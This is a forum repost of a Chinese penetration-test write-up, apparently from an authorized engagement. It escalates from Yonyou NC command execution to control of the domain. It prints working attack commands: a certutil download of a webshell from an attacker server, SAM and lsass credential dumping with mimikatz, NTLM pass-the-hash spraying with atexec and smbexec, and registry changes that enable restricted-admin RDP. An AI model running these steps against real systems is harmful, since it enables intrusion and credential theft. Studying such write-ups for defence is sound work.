安全矩阵

 找回密码
 立即注册
搜索
查看: 2828|回复: 0

用友nc命令执行到域控

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-4-11 00:06:59 | 显示全部楼层 |阅读模式
用友nc命令执行到域控原创 yudays yudays实验室

2022-04-10 20:36

转载自:https://mp.weixin.qq.com/s?__biz=MzU0NjU5NDE4Mg==&mid=2247484867&idx=1&sn=437aaef52deac48f485888368741752e&chksm=fb5a092acc2d803cae0bc3c9cb8f6ba7c80cd322dfb63c4ad8ca3a108761a622c45111d6fe92&mpshare=1&scene=23&srcid=0410aXXEyuS7DjsDsD1KbxJS&sharer_sharetime=1649594321542&sharer_shareid=ee83a55e0b955b99e8343acbb61916b7#rd

欢迎转发,请勿抄袭

分享一次授权实战经历。

一、信息收集:
发现目标使用了用友nc,且存在命令执行测试页面。


发现存在域。

当前登陆用户为域管。


二、获取webshell
1、尝试使用上传漏洞获取webshell.



利用失败!

2、尝试使用echo 通过命令执行的方式写出webshell。




发现jsp的webshell存在双引号,因而exec中需要双引号闭合,导致echo写不出双引号。将双引号替换成单引号,运行报错。

尝试几种方式后,发现可以通过下载证书的方式得到webshell。
  1. exec("cmd.exe /c  certutil -urlcache -split -f http://vps/ccc.txt  webapps/nc_web/ccc.jsp");
复制代码




三、凭证收集

通过哥斯拉的webshell,获取到了登陆凭证,且为域管的登陆凭证。



但是是一年前登陆,估计已经失效了,也认证一下。。
  1. python3 smbexec.py -hashes :ntlm 域/用户名@ip
复制代码





发现该ntlm已经使用不了了。

四、注册表获取本地凭证

通过wenshell的命令执行导出注册表本地用户凭证。


  1. reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  2. reg save hklm\sam e:\test\sam.hive
  3. reg save hklm\system e:\test\system.hive
复制代码


将文件下载到本地,使用mimikatz解密即可。
  1. lsadump::sam /sam:sam.hive /system:system.hive
复制代码





登陆验证。
  1. atexec.exe -hashes :ntlm ./账号@ip 需要执行的命令
复制代码




该服务器虽然域管登陆过,但是,已经失效。因此我们需要该本地凭证去喷洒其他主机,获取域管或者域成员的账号信息。

五、横向跑hash

进行ntlm喷洒
  1. for /F %I in (ip.txt) DO atexec.exe -hashes :ntlm ./administrator@%I whoami
复制代码




发现相邻ip,存在ntlm一致,尝试登陆。

通过tasklist /v查看该服务器存在域管进程。

六、使用ntlm登陆远程桌面

开启ntlm远程登陆,登陆远程桌面。
  1. REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
复制代码

     


七、获取域管凭证

上传内存hash读取工具,Lsass_Dump.exe,得到内存1.dmp文件,下载到本地。使用猕猴桃解密。


验证该ntlm值。
  1. atexec.exe -hashes :ntlm 域/administrator@ip whoami
复制代码




发现该ntlm是正确的域管值,该ntlm可登陆域内任何主机。

八、登陆域控

在域内机器登陆域账号的情况下执行。
  1. net group "domain controllers" /domain 查找域管理器,再ping即可得到域控ip
复制代码



得到域控ip之后,不能直接通过ntlm登陆,先用smb管道开启ntlm登陆方式。
​​​​​​​
  1. python3 smbexec.py -hashes :ntlm 域/域管用户@域控ip
  2. 并执行
  3. REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
复制代码

并开启mtlm远程桌面登陆。配合猕猴桃登陆即可。


总结:相对来说这次还是比较幸运,直接获取可以得到域管凭证。
文章声明:文章涉及到的工具、及教程仅供学习参考,请勿非法使用。否则与作者无关!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 14:32 , Processed in 0.017763 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表